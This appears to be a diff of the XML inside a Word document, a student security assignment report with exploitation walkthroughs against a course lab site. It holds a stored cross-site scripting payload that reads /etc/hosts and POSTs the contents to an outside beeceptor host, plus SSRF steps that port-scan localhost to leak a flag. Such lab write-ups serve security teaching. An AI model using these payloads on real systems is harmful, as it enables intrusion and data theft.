-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>1</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4581" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="ListParagraph"/>
-              <w:numPr>
-                <w:ilvl w:val="0"/>
-                <w:numId w:val="13"/>
-              </w:numPr>
-              <w:ind w:firstLineChars="0"/>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>http://localhost:</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>1</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="ListParagraph"/>
-              <w:numPr>
-                <w:ilvl w:val="0"/>
-                <w:numId w:val="13"/>
-              </w:numPr>
-              <w:ind w:firstLineChars="0"/>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>http://localhost:2</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="ListParagraph"/>
-              <w:numPr>
-                <w:ilvl w:val="0"/>
-                <w:numId w:val="13"/>
-              </w:numPr>
-              <w:ind w:firstLineChars="0"/>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>http://localhost:8873</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3779" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>P</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>ort</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>-</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">scan the server till </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>the response changes.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D6F4B65" wp14:editId="08674FF3">
-                  <wp:extent cx="2366760" cy="371436"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:docPr id="3" name="Picture 3"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -14975,6 +13199,990 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
+                            <a:ext cx="1735839" cy="450486"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>In the user profile page, we can see that the user successfully passed the probation and leaked out the sensitive information (in form of the flag)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45D8B95B" wp14:editId="0281254E">
+                  <wp:extent cx="1678189" cy="767443"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="7" name="Picture 7"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="7" name="Picture 7"/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId23"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="1702664" cy="778635"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="right"/>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Proof_of_Concept_1" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:eastAsia="zh-CN"/>
+          </w:rPr>
+          <w:t>Return to the main report</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="54" w:name="_Exploitation_2"/>
+      <w:bookmarkStart w:id="55" w:name="_Toc71393761"/>
+      <w:bookmarkEnd w:id="54"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>E</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>xploitation 2</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="55"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>he following step shows how stored cross-site</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> scripting can be exploited to fetch a file from the filesystem.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="786"/>
+        <w:gridCol w:w="4657"/>
+        <w:gridCol w:w="3576"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="846" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>S</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>tep</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5166" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>P</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ayload</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3007" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>E</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xplanation</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="846" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5166" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New" w:hint="eastAsia"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">!-- </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xxs_2.html --&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  var xhr = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  xhr.onload = function () {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    var xhr2 = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    xhr2.send("test=" + this.responseText);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  };</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  xhr.open("GET", "/etc/hosts");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  xhr.send();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3007" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Su</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>bmitting this payload as an anonymous question gives the following response:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13C7EAE4" wp14:editId="57F0A1CF">
+                  <wp:extent cx="2128157" cy="1101812"/>
+                  <wp:effectExtent l="0" t="0" r="5715" b="3175"/>
+                  <wp:docPr id="8" name="Picture 8"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId24"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2128157" cy="1101812"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="56" w:name="_Section_3_–"/>
+      <w:bookmarkStart w:id="57" w:name="_Toc71393762"/>
+      <w:bookmarkEnd w:id="56"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>ection 3 – Server-side request forgery exploitation walkthrough</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="57"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>The</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ollowing step shows using the server-side request forgery to get the background checks information in form of the flag. Each payload is placed at the end of </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId25" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:eastAsia="zh-CN"/>
+          </w:rPr>
+          <w:t>http://assignment-hermes.unimelb.life/validate.php?web=</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="659"/>
+        <w:gridCol w:w="4683"/>
+        <w:gridCol w:w="3677"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="659" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>S</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>tep</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4581" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>P</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ayload</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>E</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xplanation</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="659" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4581" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="13"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
